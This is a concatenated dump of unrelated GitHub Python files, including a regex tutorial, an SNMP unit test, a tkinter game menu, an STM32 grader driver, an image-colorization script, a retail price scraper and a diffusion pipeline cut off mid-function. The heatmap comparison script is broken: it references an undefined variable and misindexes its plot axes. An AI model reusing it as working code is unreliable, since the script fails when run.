+{"seq_id":"1217534545","text":"import re\n\n# 同时提取 月 日\nregex = r\"^([a-zA-Z]+) (\\d+)$\" # 必须使用 raw string\nif re.search(regex, \"June 24\"):\n match = re.search(regex, \"June 24\")\n\n print(\"Match at index %s, %s\" % (match.start(), match.end()))\n\n # match.group(0),match.group() 全部提取信息\n # match.group(1), match.group(2), ... 从左到右返回提取信息\n print(\"Full match: %s\" % (match.group(0)))\n print(\"Month: %s\" % (match.group(1)))\n print(\"Day: %s\" % (match.group(2)))\nelse:\n print(\"The regex pattern does not match. :(\")\n\nregex = r\"^[a-zA-Z]+ \\d+$\"\n# 找出所有匹配信息\nmatches = re.findall(regex, \"June 24, August 9, Dec 12\")\nfor match in matches:\n print(\"Full match: %s\" % (match))\n\n# 提取月\nregex = r\"([a-zA-Z]+) \\d+\"\nmatches = re.findall(regex, \"June 24, August 9, Dec 12\")\nfor match in matches:\n print(\"Match month: %s\" % (match))\n\nregex = r\"([a-zA-Z]+) \\d+\"\n# 返回匹配的开始 结束位置\nmatches = re.finditer(regex, \"June 24, August 9, Dec 12\")\nfor match in matches:\n print(\"Match at index: %s, %s\" % (match.start(), match.end()))\n\nregex = r\"([a-zA-Z]+) (\\d+)\"\nregex1 = r\"\\2 of \\1\"\n\n# 替换提取到的信息为新的模式\nprint(re.sub(regex, regex1, \"June 24, August 9, Dec 12\"))\n\nregex = re.compile(r\"(\\w+) World\")\nresult = regex.search(\"Hello World is the easiest\")\nif result:\n print(result.start(), result.end())\n\nfor result in regex.findall(\"Hello World, Bonjour World\"):\n print(result)\n\nprint(regex.sub(r\"\\1 Earth\", \"Hello World\"))\n","repo_name":"AutuanLiu/Fastai-Notes-V3","sub_path":"src/Regular_expressions.py","file_name":"Regular_expressions.py","file_ext":"py","file_size_in_byte":1512,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"16"}
+{"seq_id":"42345076261","text":"import os\nimport unittest\nfrom pyats.topology import loader\nfrom genie.libs.sdk.apis.linux.snmp.get import get_snmp_snmpwalk_v3\n\n\nclass TestGetSnmpSnmpwalkV3(unittest.TestCase):\n\n @classmethod\n def setUpClass(self):\n testbed = f\"\"\"\n devices:\n morph-full2:\n connections:\n defaults:\n class: unicon.Unicon\n a:\n command: mock_device_cli --os linux --mock_data_dir {os.path.dirname(__file__)}/mock_data --state connect\n protocol: unknown\n os: linux\n platform: linux\n type: linux\n \"\"\"\n self.testbed = loader.load(testbed)\n self.device = self.testbed.devices['morph-full2']\n self.device.connect(\n learn_hostname=True,\n init_config_commands=[],\n init_exec_commands=[]\n )\n\n def test_get_snmp_snmpwalk_v3(self):\n result = get_snmp_snmpwalk_v3(self.device, '172.20.249.11', '1.3.6.1.4.1.9.9.25.1.1.1.2', 'TestUsr2', 'password1', 'authPriv', 'md5', 'des', 'password', '3', None)\n expected_output = 'snmpget: Unknown user name'\n self.assertEqual(result, expected_output)\n","repo_name":"CiscoTestAutomation/genielibs","sub_path":"pkgs/sdk-pkg/src/genie/libs/sdk/apis/tests/linux/snmp/get/get_snmp_snmpwalk_v3/test_api_get_snmp_snmpwalk_v3.py","file_name":"test_api_get_snmp_snmpwalk_v3.py","file_ext":"py","file_size_in_byte":1194,"program_lang":"python","lang":"en","doc_type":"code","stars":98,"dataset":"github-code","pt":"16"}
+{"seq_id":"5111478825","text":"import tkinter as tk\nfrom random import randrange\n\n# Create tk instance\nhome_page = tk.Tk()\n\n# Window title\nhome_page.title(\"Minigames by Victor Nestor\")\n\n# Disable resizing\nhome_page.resizable(False, False)\n\n# Window sizing and position\nwindow_height = 500\nwindow_width = 500\nscreen_height = home_page.winfo_screenheight()\nscreen_width = home_page.winfo_screenwidth()\ny_coordinate = int((screen_height/2) - (window_height/2))\nx_coordinate = int((screen_width/2) - (window_width/2))\n\n# Set the dimensions and position of window.\nhome_page.geometry(\"{}x{}+{}+{}\".format(window_width,\n window_height, x_coordinate, y_coordinate))\n\n# Grid geometry\n# home_page.grid_rowconfigure(0, weight=1)\n# home_page.grid_rowconfigure(1, weight=1)\n# home_page.grid_rowconfigure(2, weight=1)\n# home_page.grid_rowconfigure(3, weight=1)\n# home_page.grid_rowconfigure(4, weight=1)\n# home_page.grid_rowconfigure(5, weight=1)\n# home_page.grid_rowconfigure(6, weight=1)\n# home_page.grid_rowconfigure(7, weight=1)\n# home_page.grid_rowconfigure(8, weight=1)\n# home_page.grid_rowconfigure(9, weight=1)\n# home_page.grid_rowconfigure(10, weight=1)\nfor num in range(0, 8):\n # Create 8 rows\n home_page.grid_rowconfigure(num, weight=1)\n\n# home_page.grid_columnconfigure(0, weight=1)\n# home_page.grid_columnconfigure(1, weight=1)\n# home_page.grid_columnconfigure(2, weight=1)\n# home_page.grid_columnconfigure(3, weight=1)\n# home_page.grid_columnconfigure(4, weight=1)\n\nfor num in range(0, 5):\n # Create 5 columns\n home_page.grid_columnconfigure(num, weight=1)\n\n# Create labels\nhome_label = tk.Label(home_page, text=\"Python Minigames!\", font=(30))\nfirst_line_break = tk.Label(\n home_page, text=\"*\" * 75)\ngame_label = tk.Label(home_page, text=\"Pick A Game\", font=(20))\nchosen_label = tk.Label(home_page, text=\"Game chosen: \\n\\nNone\", font=(20))\nsecond_line_break = tk.Label(\n home_page, text=\"*\" * 75)\nthird_line_break = tk.Label(\n home_page, text=\"*\" * 75)\n\n# Create buttons\n\n# List of games\ngame_buttons = []\ntic_tac_toe_button = tk.Button(\n home_page, text=\"Tic-Tac-Toe\", command=lambda: set_game(1))\ngame_buttons.append(tic_tac_toe_button)\nrock_paper_scissors_button = tk.Button(\n home_page, text=\"Rock, Paper, Scissors\", command=lambda: set_game(2))\ngame_buttons.append(rock_paper_scissors_button)\nguess_the_number_button = tk.Button(\n home_page, text=\"Guess The Number\", command=lambda: set_game(3))\ngame_buttons.append(guess_the_number_button)\nsnake_game_button = tk.Button(\n home_page, text=\"Snake Game\", command=lambda: set_game(4))\ngame_buttons.append(snake_game_button)\n\n# Start game list\nstart_game_list = []\nstart_game_button = tk.Button(home_page, text=\"Start Game\")\nstart_game_list.append(start_game_button)\n\n\n# Append labels and buttons to home page\nhome_label.grid(row=0, column=0, columnspan=5)\nfirst_line_break.grid(row=1, column=0, columnspan=5)\ngame_label.grid(row=2, column=0, columnspan=5)\nsecond_line_break.grid(row=4, column=0, columnspan=5)\nchosen_label.grid(row=5, column=0, columnspan=5)\nthird_line_break.grid(row=6, column=0, columnspan=5)\n\n# Append game buttons\nfor row in range(0, 1):\n for col in range(0, 4):\n i = row * 4 + col\n game_buttons[i].grid(row=row+3, column=col+1)\n\nstart_game_list[0].grid(row=7, column=0, columnspan=5)\n\n\n# Setup for selected game\n\n# 0 for none selected\ngame_selected = 0\n\nprint(game_selected)\n\n# Reset all variables\n\n\ndef init():\n global game_buttons, mode_buttons, game_selected, chosen_label\n game_selected = 0\n chosen_label[\"text\"] = \"Game chosen: \\n\\nNone\"\n\n\ndef set_game(i):\n global game_buttons, mode_buttons, game_selected\n print(i)\n game_selected = i\n # Check which game is selected\n if game_selected == 1:\n chosen_label[\"text\"] = \"Game chosen: \\n\\nTic-Tac-Toe\"\n elif game_selected == 2:\n chosen_label[\"text\"] = \"Game chosen: \\n\\nRock, Paper, Scissors\"\n elif game_selected == 3:\n chosen_label[\"text\"] = \"Game chosen: \\n\\nGuess The Number\"\n elif game_selected == 4:\n chosen_label[\"text\"] = \"Game chosen: \\n\\nSnake Game\"\n\n\ndef start_game(i):\n global game_selected\n\n\n# Mainloop keeps the program running until closed by the user.\nhome_page.mainloop()\n","repo_name":"VNestor/python-minigames","sub_path":"home.py","file_name":"home.py","file_ext":"py","file_size_in_byte":4235,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"70171914250","text":"def createDataBase(db):\n cursor = db.cursor()\n cursor.execute('CREATE TABLE IF NOT EXISTS scores(bestScores)')\n\ndef insertNewHighScore(db, points):\n cursor = db.cursor()\n bestScore = returnBestScore(db)\n\n if points > bestScore:\n cursor.execute(f'INSERT INTO scores VALUES({points})')\n db.commit()\n\ndef returnBestScore(db):\n cursor = db.cursor()\n result = cursor.execute('SELECT bestScores FROM scores')\n\n bestScore = 0\n for row in result.fetchall():\n if row[0] > bestScore:\n bestScore = row[0]\n\n return bestScore\n","repo_name":"flipe27/flappy-bird","sub_path":"database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"74870835207","text":"import os\nimport sys\nimport serial\nimport threading\nimport struct\nimport time\nimport traceback\n\nfrom AutoGrader.devices import HardwareBase\n\n\nclass STM32(HardwareBase):\n CMD_RESET_DUT = 'U'\n CMD_RESET_TESTER = 'R'\n CMD_ENABLE_ANALOG = 'O'\n CMD_TERMINATE = 'E'\n \n START_DELIM = b'S'\n STOP_DELIM = b'E'\n TOTAL_PKT_LEN = 9\n\n # parameters\n baud_rate = 460800\n usb_path = None\n input_waveform_path = None\n output_waveform_path = None\n\n # device info\n name = None\n config = None\n\n # parent\n hardware_engine = None\n\n # serial\n dev = None\n\n # files\n fin = None\n output_metadata = None\n\n # thread status\n uart_reading_thread = None\n alive = True\n\n # execution\n execution_start_time = None\n\n def __init__(self, name, config, hardware_engine, file_folder):\n \n if 'baud' in config:\n self.baud_rate = config['baud']\n\n if \"usb_path\" not in config:\n raise Exception('\"usb_path\" field is required')\n self.usb_path = config['usb_path']\n\n if 'input_waveform_file' not in config:\n raise Exception('\"input_waveform_file\" field is required')\n self.input_waveform_path = os.path.join(file_folder, config['input_waveform_file'])\n\n if 'output_waveform_file' in config and config['output_waveform_file']:\n self.output_waveform_path = os.path.join(file_folder, config['output_waveform_file'])\n else:\n self.output_waveform_path = '/dev/null'\n\n if 'output_metadata' not in config:\n raise Exception('\"output_metadata\" field is required')\n self.output_metadata = config['output_metadata']\n\n self.name = name\n self.config = config\n self.hardware_engine = hardware_engine\n\n def on_before_execution(self):\n\n # open serial port\n tmp_dev = serial.Serial()\n tmp_dev.port = self.usb_path\n tmp_dev.baudrate = self.baud_rate\n tmp_dev.parity = serial.PARITY_NONE\n tmp_dev.bytesize = serial.EIGHTBITS\n tmp_dev.stopbits = serial.STOPBITS_ONE\n tmp_dev.timeout = 0.01\n tmp_dev.writeTimeout = None\n\n # open input waveform file but get rid of the metadata part\n self.fin = open(self.input_waveform_path, 'r')\n while True:\n line = self.fin.readline()\n if not line or line.strip() == '==':\n break\n\n # open output waveform file and write the meatadata part\n self.output_lines = []\n self.output_lines.append('') # period\n self.output_lines.append('Tick frequency: %f' % self.output_metadata['tick_frequency'])\n self.output_lines.append('Display start')\n for pin_config in self.output_metadata['pins']:\n self.output_lines.append('%s,%s' % (\n pin_config['label'],\n ','.join(list(map(str, pin_config['indexes']))),\n ))\n self.output_lines.append('Display end')\n self.output_lines.append('==')\n\n self.alive = True\n \n try:\n tmp_dev.open() \n self.dev = tmp_dev\n print('(STM32) UART is open')\n self.send_command(self.CMD_RESET_TESTER)\n print('(STM32) reset')\n time.sleep(1)\n self.uart_reading_thread = threading.Thread(\n target=self._reading_thread, name=('STM32-%s-reading' % self.name)).start()\n except:\n exc_info = sys.exc_info()\n print('(STM32) UART device unable to open, full stack trace below')\n traceback.print_exception(*exc_info)\n self.alive = False\n\n def on_execute(self):\n self.execution_start_time = time.time()\n\n # feed input waveform file into STM32\n for line in self.fin:\n if not self.alive:\n break\n terms = line.split(',')\n pkt_type, pkt_time, pkt_val = chr(int(terms[0])), int(terms[1]), int(terms[2])\n binary = struct.pack('=ccIHc', self.START_DELIM, pkt_type.encode('ascii'), pkt_time,\n pkt_val, self.STOP_DELIM)\n if not self.dev:\n print('(STM32) UART device does not exist, not able to send the command')\n return\n self.dev.write(binary)\n print('(STM32) packet sent', pkt_type, pkt_time, pkt_val)\n\n self.fin.close()\n\n def on_terminate(self):\n self.alive = False\n \n execution_stop_time = time.time()\n execution_elasped_time = execution_stop_time - self.execution_start_time\n self.output_lines[0] = \"Period: %f\" % execution_elasped_time\n\n with open(self.output_waveform_path, 'w') as fo:\n fo.write('\\n'.join(self.output_lines))\n \n def on_reset_after_execution(self):\n \n try:\n self.dev.flush()\n self.dev.close()\n print('(STM32) UART is closed')\n except:\n print('(STM32) UART device unable to close')\n self.dev = None\n\n def __del__(self):\n if self.dev and self.dev.is_open:\n self.dev.close()\n\n def _reading_thread(self):\n rx_buffer = b''\n\n while self.alive:\n # continue immediately if serial isn't ready\n if not self.dev:\n continue\n\n # Because we set a read timeout, chances are we only get a \n # partial of a packet\n rx_buffer += self.dev.read(self.TOTAL_PKT_LEN)\n \n # Thus, if it's not a complete packet yet, read more\n if len(rx_buffer) < self.TOTAL_PKT_LEN:\n continue\n\n # check the packet is valid via start and stop byte\n # (The reason that we have to use bytes[0:1] is that var[0] returns an int)\n if rx_buffer[0:1] == self.START_DELIM and rx_buffer[8:9] == self.STOP_DELIM:\n self._handle_packet_payload(rx_buffer[1:8])\n else:\n print('(STM32) bad packet!', rx_buffer[0:9])\n\n rx_buffer = rx_buffer[9:]\n \n def _handle_packet_payload(self, binary):\n # 1B type, 4B time, 2B val\n [pkt_type, pkt_time, pkt_val] = struct.unpack('= FLAGS.max):\n break\n gray, _, _ = _pic2pic.encode_bgr(images.copy(), FLAGS.downsize)\n #l, ab, w = _pic2pic.encode_lab(images.copy(), FLAGS.downsize)\n #\n color, = sess.run([COLOR], feed_dict={GRAY: gray})\n\n cv2.imwrite(gallery.next(), gray[0])\n\n full = np.zeros(images.shape, dtype=np.float32)\n color /= 255.0\n gray /= 255.0\n _, H, W, _ = images.shape\n for i in range(images.shape[0]):\n lab = cv2.cvtColor(cv2.cvtColor(gray[i], cv2.COLOR_GRAY2BGR), cv2.COLOR_BGR2LAB)\n print(lab.shape)\n full[i, :, :, :1] = lab[:, :, :1]\n one = cv2.resize(color[i], (W, H))\n\n lab = cv2.cvtColor(one, cv2.COLOR_BGR2LAB)\n full[i, :, :, 1:] = lab[:, :, 1:]\n cv2.cvtColor(full[i], cv2.COLOR_LAB2BGR, full[i])\n if FLAGS.s_add and FLAGS.s_mul:\n hsv = cv2.cvtColor(full[i], cv2.COLOR_BGR2HSV)\n h, s, v = cv2.split(hsv)\n s *= FLAGS.s_mul\n s += FLAGS.s_add\n hsv = cv2.merge([h, s, v])\n cv2.cvtColor(hsv, cv2.COLOR_HSV2BGR, full[i])\n pass\n full *= 255\n cv2.imwrite(gallery.next(), full[0])\n #y_p = decode_lab(l, ab_p, T=FLAGS.T)\n c += 1\n print('%d/%d' % (c, FLAGS.max))\n pass\n gallery.flush()\n pass\n pass\n\nif __name__ == '__main__':\n tf.app.run()\n\n","repo_name":"aaalgo/pic2pic","sub_path":"gan-colorize-val.py","file_name":"gan-colorize-val.py","file_ext":"py","file_size_in_byte":3909,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"41672794051","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[7]:\n\n\nimport requests\nfrom bs4 import BeautifulSoup\n\ndef scrape_amazon(keyword):\n url = f'https://www.amazon.in/s?k={keyword}'\n headers = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3'}\n response = requests.get(url, headers=headers)\n soup = BeautifulSoup(response.content, 'html.parser')\n\n products = soup.find_all('div', {'data-component-type': 's-search-result'})\n\n results = []\n for product in products:\n name_elem = product.find('span', {'class': 'a-size-medium'})\n price_elem = product.find('span', {'class': 'a-offscreen'})\n\n if name_elem and price_elem:\n name = name_elem.text.strip()\n price = price_elem.text.strip()\n results.append({'name': name, 'price': price})\n\n return results\n\ndef scrape_walmart(keyword):\n url = f'https://www.walmart.com/search/?query={keyword}'\n headers = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3'}\n response = requests.get(url, headers=headers)\n soup = BeautifulSoup(response.content, 'html.parser')\n\n products = soup.find_all('div', {'class': 'search-result-product-title'})\n\n results = []\n for product in products:\n name_elem = product.find('a')\n price_elem = product.find_next('span', {'class': 'price-group'})\n\n if name_elem and price_elem:\n name = name_elem.text.strip()\n price = price_elem.text.strip()\n results.append({'name': name, 'price': price})\n\n return results\n\n# Example usage\nkeyword = 'laptop'\namazon_results = scrape_amazon(keyword)\nwalmart_results = scrape_walmart(keyword)\n\nif not amazon_results:\n print('No results found on Amazon.')\nelse:\n print('Amazon Results:')\n for result in amazon_results:\n print(result['name'], result['price'])\n\nif not walmart_results:\n print('No results found on Walmart.')\nelse:\n print('\\nWalmart Results:')\n for result in walmart_results:\n print(result['name'], result['price'])\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"NikeshKr/AmazonWebScrapper","sub_path":"amazonscrapper.py.py","file_name":"amazonscrapper.py.py","file_ext":"py","file_size_in_byte":2202,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"3085715238","text":"# ******************************************************\n# Program: compare_fields.py\n# Author: Stefano Ubbiali\n# Email: subbiali@phys.ethz.ch\n# Date: 04.06.2020\n# Description: Comparing two NumPy arrays\n# ******************************************************\nimport click\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef read_field_from_file(filename, num_halo=None):\n (rank, nbits, num_halo, nx, ny, nz) = np.fromfile(filename, dtype=np.int32, count=6)\n offset=(3 + rank) * 32 // nbits\n data = np.fromfile(filename, dtype=np.float32 if nbits == 32 else np.float64, \\\n count=nz * ny * nx + offset)\n if rank == 3:\n return np.reshape(data[offset:], (nz, ny, nx))\n else:\n return np.reshape(data[offset:], (ny, nx))\n\nfig, axs = plt.subplots(1, 1) #, figsize=(12, 4))\n\nref_field = read_field_from_file('out_field_mpi.dat')\nhybrid_field = read_field_from_file('out_field_mpiomp.dat')\ncomp_field = hybrid_field - ref_field\n \nk_lev = in_field.shape[0] // 2\nim1 = axs[0].imshow(comp_field[k_lev, :, :], origin='lower', vmin=-0.1, vmax=1.1);\nfig.colorbar(im1, ax=axs[0]);\naxs[0].set_title('Comparison field (k = {})'.format(k_lev));\n\n \n #k_lev = out_field.shape[0] // 2\n #im2 = axs[1].imshow(out_field[k_lev, :, :], origin='lower', vmin=-0.1, vmax=1.1);\n #fig.colorbar(im2, ax=axs[1]);\n #axs[1].set_title('Final result (k = {})'.format(k_lev));\n \nplt.savefig('test.png')","repo_name":"colintully92/HPCproject","sub_path":"heatmap.py","file_name":"heatmap.py","file_ext":"py","file_size_in_byte":1463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"22863625418","text":"import math\nfrom typing import Any, Dict\n\nimport cv2\nimport numpy as np\nimport torch\nimport torch.nn.functional as F\nfrom diffusers import LMSDiscreteScheduler, StableDiffusionPipeline\nfrom diffusers.models.attention_processor import Attention\nfrom diffusers.pipelines.stable_diffusion.pipeline_stable_diffusion import \\\n StableDiffusionPipelineOutput\nfrom PIL import Image\nfrom tqdm.auto import tqdm\n\nfrom modelscope.metainfo import Pipelines\nfrom modelscope.outputs import OutputKeys\nfrom modelscope.pipelines.builder import PIPELINES\nfrom modelscope.pipelines.multi_modal.diffusers_wrapped.diffusers_pipeline import \\\n DiffusersPipeline\nfrom modelscope.utils.constant import Tasks\n\n\n@PIPELINES.register_module(\n Tasks.text_to_image_synthesis, module_name=Pipelines.cones2_inference)\nclass Cones2InferencePipeline(DiffusersPipeline):\n r\"\"\" Cones2 Inference Pipeline.\n\n Examples:\n\n >>> from modelscope.pipelines import pipeline\n\n >>> pipeline =pipeline(task=Tasks.text_to_image_synthesis, model= 'damo/Cones2', model_revision='v1.0.1')\n >>> {\n >>> \"text\": 'a mug and a dog on the beach',\n >>> \"subject_list\": [[\"mug\", 2], [\"dog\", 5]],\n >>> \"color_context\": {\"255,192,0\": [\"mug\", 2.5], \"255,0,0\": [\"dog\", 2.5]},\n >>> \"layout\": 'data/test/images/mask_example.png'\n >>> }\n >>>\n \"\"\"\n\n def __init__(self, model: str, device: str = 'gpu', **kwargs):\n \"\"\"\n use `model` to create a stable diffusion pipeline\n Args:\n model: model id on modelscope hub.\n device: str = 'gpu'\n \"\"\"\n super().__init__(model, device, **kwargs)\n self.pipeline = StableDiffusionPipeline.from_pretrained(model)\n self.pipeline.text_encoder.pooler = None\n self.pipeline.to(self.device)\n\n def forward(self, inputs: Dict[str, Any],\n **forward_params) -> Dict[str, Any]:\n if not isinstance(inputs, dict):\n raise ValueError(\n f'Expected the input to be a dictionary, but got {type(input)}'\n )\n if 'text' not in inputs:\n raise ValueError('input should contain \"text\", but not found')\n\n return self.layout_guidance_sampling(\n prompt=inputs.get('text'),\n residual_dict=inputs.get('residual_dict', None),\n subject_list=inputs.get('subject_list'),\n color_context=inputs.get('color_context', None),\n layout=inputs.get('layout', None),\n )\n\n @torch.no_grad()\n def layout_guidance_sampling(\n self,\n prompt='',\n residual_dict=None,\n subject_list=None,\n color_context=None,\n layout=None,\n cfg_scale=7.5,\n inference_steps=50,\n guidance_steps=50,\n guidance_weight=0.05,\n weight_negative=-1e8,\n ):\n\n layout = Image.open(layout).resize((768, 768)).convert('RGB')\n subject_color_dict = {\n tuple(map(int, key.split(','))): value\n for key, value in color_context.items()\n }\n\n vae = self.pipeline.vae\n unet = self.pipeline.unet\n text_encoder = self.pipeline.text_encoder\n tokenizer = self.pipeline.tokenizer\n unconditional_input_prompt = ''\n scheduler = LMSDiscreteScheduler.from_config(\n self.pipeline.scheduler.config)\n scheduler.set_timesteps(inference_steps, device=self.device)\n if guidance_steps > 0:\n guidance_steps = min(guidance_steps, inference_steps)\n scheduler_guidance = LMSDiscreteScheduler(\n beta_start=0.00085,\n beta_end=0.012,\n beta_schedule='scaled_linear',\n num_train_timesteps=1000,\n )\n scheduler_guidance.set_timesteps(\n guidance_steps, device=self.device)\n\n # Process input prompt text\n text_input = tokenizer(\n [prompt],\n padding='max_length',\n max_length=tokenizer.model_max_length,\n truncation=True,\n return_tensors='pt',\n )\n\n # Edit text embedding conditions with residual token embeddings.\n cond_embeddings = text_encoder(text_input.input_ids.to(self.device))[0]\n if residual_dict is not None:\n for name, token in subject_list:\n residual_token_embedding = torch.load(residual_dict[name])\n cond_embeddings[0][token] += residual_token_embedding.reshape(\n 1024)\n\n # Process unconditional input \"\" for classifier-free guidance.\n max_length = text_input.input_ids.shape[-1]\n uncond_input = tokenizer([unconditional_input_prompt],\n padding='max_length',\n max_length=max_length,\n return_tensors='pt')\n uncond_embeddings = text_encoder(\n uncond_input.input_ids.to(self.device))[0]\n\n register_attention_control(unet)\n\n # Calculate the hidden features for each cross attention layer.\n hidden_states, uncond_hidden_states = _extract_cross_attention(\n tokenizer, self.device, layout, subject_color_dict, text_input,\n weight_negative)\n hidden_states['CONDITION_TENSOR'] = cond_embeddings\n uncond_hidden_states['CONDITION_TENSOR'] = uncond_embeddings\n hidden_states['function'] = lambda w, sigma, qk: (\n guidance_weight * w * math.log(1 + sigma**2)) * qk.std()\n uncond_hidden_states['function'] = lambda w, sigma, qk: 0.0\n\n # Sampling the initial latents.\n latent_size = (1, unet.in_channels, 96, 96)\n latents = torch.randn(latent_size).to(self.device)\n latents = latents * scheduler.init_noise_sigma\n\n for i, t in tqdm(\n enumerate(scheduler.timesteps),\n total=len(scheduler.timesteps)):\n # Improve the harmony of generated images by self-recurrence.\n if i < guidance_steps:\n loop = 2\n else:\n loop = 1\n for k in range(loop):\n if i < guidance_steps:\n sigma = scheduler_guidance.sigmas[i]\n latent_model_input = scheduler.scale_model_input(\n latents, t)\n _t = t\n\n hidden_states.update({'SIGMA': sigma})\n\n noise_pred_text = unet(\n latent_model_input,\n _t,\n encoder_hidden_states=hidden_states,\n ).sample\n\n uncond_hidden_states.update({'SIGMA': sigma})\n\n noise_pred_uncond = unet(\n latent_model_input,\n _t,\n encoder_hidden_states=uncond_hidden_states,\n ).sample\n\n noise_pred = noise_pred_uncond + cfg_scale * (\n noise_pred_text - noise_pred_uncond)\n latents = scheduler.step(noise_pred, t, latents,\n 1).prev_sample\n\n # Self-recurrence.\n if k < 1 and loop > 1:\n noise_recurent = torch.randn(latents.shape).to(\n self.device)\n sigma_difference = scheduler.sigmas[\n i]**2 - scheduler.sigmas[i + 1]**2\n latents = latents + noise_recurent * (\n sigma_difference**0.5)\n else:\n latent_model_input = scheduler.scale_model_input(\n latents, t)\n _t = t\n noise_pred_text = unet(\n latent_model_input,\n _t,\n encoder_hidden_states=cond_embeddings,\n ).sample\n\n latent_model_input = scheduler.scale_model_input(\n latents, t)\n\n noise_pred_uncond = unet(\n latent_model_input,\n _t,\n encoder_hidden_states=uncond_embeddings,\n ).sample\n\n noise_pred = noise_pred_uncond + cfg_scale * (\n noise_pred_text - noise_pred_uncond)\n latents = scheduler.step(noise_pred, t, latents,\n 1).prev_sample\n\n edited_images = _latents_to_images(vae, latents)\n\n return StableDiffusionPipelineOutput(\n images=edited_images, nsfw_content_detected=None)\n\n def postprocess(self, inputs: Dict[str, Any], **kwargs) -> Dict[str, Any]:\n images = []\n for img in inputs.images:\n if isinstance(img, Image.Image):\n img = cv2.cvtColor(np.array(img), cv2.COLOR_RGB2BGR)\n images.append(img)\n return {OutputKeys.OUTPUT_IMGS: images}\n\n\nclass Cones2AttnProcessor:\n\n def __init__(self):\n super().__init__()\n\n def __call__(self,\n attn: Attention,\n hidden_states,\n encoder_hidden_states=None,\n attention_mask=None):\n batch_size, sequence_length, _ = hidden_states.shape\n query = attn.to_q(hidden_states)\n is_dict_format = True\n if encoder_hidden_states is not None:\n if 'CONDITION_TENSOR' in encoder_hidden_states:\n encoder_hidden = encoder_hidden_states['CONDITION_TENSOR']\n else:\n encoder_hidden = encoder_hidden_states\n is_dict_format = False\n else:\n encoder_hidden = hidden_states\n\n key = attn.to_k(encoder_hidden)\n value = attn.to_v(encoder_hidden)\n\n query = attn.head_to_batch_dim(query)\n key = attn.head_to_batch_dim(key)\n value = attn.head_to_batch_dim(value)\n\n attention_scores = torch.matmul(query, key.transpose(-1, -2))\n attention_size_of_img = attention_scores.size()[-2]\n\n if attention_scores.size()[2] == 77:\n if is_dict_format:\n f = encoder_hidden_states['function']\n try:\n w = encoder_hidden_states[\n f'CA_WEIGHT_{attention_size_of_img}']\n except KeyError:\n w = encoder_hidden_states['CA_WEIGHT_ORIG']\n if not isinstance(w, int):\n img_h, img_w, nc = w.shape\n ratio = math.sqrt(img_h * img_w\n / attention_size_of_img)\n w = F.interpolate(\n w.permute(2, 0, 1).unsqueeze(0),\n scale_factor=1 / ratio,\n mode='bilinear',\n align_corners=True)\n w = F.interpolate(\n w.reshape(1, nc, -1),\n size=(attention_size_of_img, ),\n mode='nearest').permute(2, 1, 0).squeeze()\n else:\n w = 0\n if type(w) is int and w == 0:\n sigma = encoder_hidden_states['SIGMA']\n cross_attention_weight = f(w, sigma, attention_scores)\n else:\n bias = torch.zeros_like(w)\n bias[torch.where(w > 0)] = attention_scores.std() * 0\n sigma = encoder_hidden_states['SIGMA']\n cross_attention_weight = f(w, sigma, attention_scores)\n cross_attention_weight = cross_attention_weight + bias\n else:\n cross_attention_weight = 0.0\n else:\n cross_attention_weight = 0.0\n\n attention_scores = (attention_scores\n + cross_attention_weight) * attn.scale\n attention_probs = attention_scores.softmax(dim=-1)\n\n hidden_states = torch.matmul(attention_probs, value)\n hidden_states = attn.batch_to_head_dim(hidden_states)\n\n # linear proj\n hidden_states = attn.to_out[0](hidden_states)\n # dropout\n hidden_states = attn.to_out[1](hidden_states)\n\n return hidden_states\n\n\ndef register_attention_control(unet):\n attn_procs = {}\n for name in unet.attn_processors.keys():\n attn_procs[name] = Cones2AttnProcessor()\n\n unet.set_attn_processor(attn_procs)\n\n\ndef _tokens_img_attention_weight(img_context_seperated,\n tokenized_texts,\n ratio: int = 8,\n original_shape=False):\n token_lis = tokenized_texts['input_ids'][0].tolist()\n w, h = img_context_seperated[0][1].shape\n\n w_r, h_r = round(w / ratio), round(h / ratio)\n ret_tensor = torch.zeros((w_r * h_r, len(token_lis)), dtype=torch.float32)\n for v_as_tokens, img_where_color in img_context_seperated:\n\n is_in = 0\n\n for idx, tok in enumerate(token_lis):\n if token_lis[idx:idx + len(v_as_tokens)] == v_as_tokens:\n is_in = 1\n\n ret_tensor[:, idx:idx + len(v_as_tokens)] += (\n _downsampling(img_where_color, w_r,\n h_r).reshape(-1,\n 1).repeat(1, len(v_as_tokens)))\n\n if not is_in == 1:\n print(\n f'Warning ratio {ratio} : tokens {v_as_tokens} not found in text'\n )\n\n if original_shape:\n ret_tensor = ret_tensor.reshape((w_r, h_r, len(token_lis)))\n\n return ret_tensor\n\n\ndef _image_context_seperator(img, color_context: dict, _tokenizer, neg: float):\n ret_lists = []\n if img is not None:\n w, h = img.size\n matrix = np.zeros((h, w))\n for color, v in color_context.items():\n color = tuple(color)\n if len(color) > 3:\n color = color[:3]\n if isinstance(color, str):\n r, g, b = color[1:3], color[3:5], color[5:7]\n color = (int(r, 16), int(g, 16), int(b, 16))\n img_where_color = (np.array(img) == color).all(axis=-1)\n matrix[img_where_color] = 1\n\n for color, (subject, weight_active) in color_context.items():\n if len(color) > 3:\n color = color[:3]\n v_input = _tokenizer(\n subject,\n max_length=_tokenizer.model_max_length,\n truncation=True,\n )\n\n v_as_tokens = v_input['input_ids'][1:-1]\n if isinstance(color, str):\n r, g, b = color[1:3], color[3:5], color[5:7]\n color = (int(r, 16), int(g, 16), int(b, 16))\n img_where_color = (np.array(img) == color).all(axis=-1)\n 